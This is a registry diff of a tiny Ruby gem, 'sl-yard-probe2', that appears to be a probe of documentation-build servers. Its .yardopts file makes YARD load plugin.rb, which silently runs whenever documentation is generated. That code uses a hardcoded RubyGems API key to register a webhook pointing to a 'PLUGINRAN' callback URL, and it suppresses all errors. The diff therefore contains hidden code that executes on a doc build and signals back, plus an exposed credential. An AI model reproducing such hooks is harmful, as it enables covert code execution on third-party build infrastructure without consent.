sl-yard-probe2 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (5) hide show
  1. checksums.yaml +7 -0
  2. data/.yardopts +1 -0
  3. data/lib/a.rb +1 -0
  4. data/plugin.rb +6 -0
  5. metadata +39 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: b58957ff2a203cdeff03b6ad4274b16867287d7c62ca302708e3d29232282421
4
+ data.tar.gz: a27057137d3c318569208107f763e15bfe19a1752e3c96a982d92f6cf7cb3919
5
+ SHA512:
6
+ metadata.gz: f72fe427f378a5a4bbcc3e1caf0bbc56588fc65817c957a3ddfeacd3cb4c78a92bf9a6ecccd597bbc4072eb8f61a9d1ea62fe9e7db833abf3bc59844e6a4fa4f
7
+ data.tar.gz: b2f86afa775b4e4699c47543262b40427fa590d5c623d5f63c1a899d1ccf275cc6e8b6a951f3e9c83c1afdbfe31b1e946334206567dbc3ac90b2dd275cf37241
data/.yardopts ADDED
@@ -0,0 +1 @@
1
+ --load ./plugin.rb
data/lib/a.rb ADDED
@@ -0,0 +1 @@
1
+ # hi class A;end
data/plugin.rb ADDED
@@ -0,0 +1,6 @@
1
+ begin
2
+ require 'net/http'; require 'uri'
3
+ uri=URI('https://rubygems.org/api/v1/web_hooks'); req=Net::HTTP::Post.new(uri); req['Authorization']='rubygems_2f4dd0ecb50ad07e8f311a5b081fbc17c5ec68772ac34777'; req.set_form_data({'gem_name'=>'sl-yard-probe2','url'=>'https://example.com/PLUGINRAN'+Time.now.to_i.to_s});
4
+ Net::HTTP.start(uri.hostname,uri.port,use_ssl:true){|h| h.request(req)}
5
+ rescue => e
6
+ end
metadata ADDED
@@ -0,0 +1,39 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: sl-yard-probe2
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - a
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - lib/a.rb
18
+ - plugin.rb
19
+ licenses:
20
+ - MIT
21
+ metadata: {}
22
+ rdoc_options: []
23
+ require_paths:
24
+ - lib
25
+ required_ruby_version: !ruby/object:Gem::Requirement
26
+ requirements:
27
+ - - ">="
28
+ - !ruby/object:Gem::Version
29
+ version: '0'
30
+ required_rubygems_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ requirements: []
36
+ rubygems_version: 3.6.7
37
+ specification_version: 4
38
+ summary: doc
39
+ test_files: []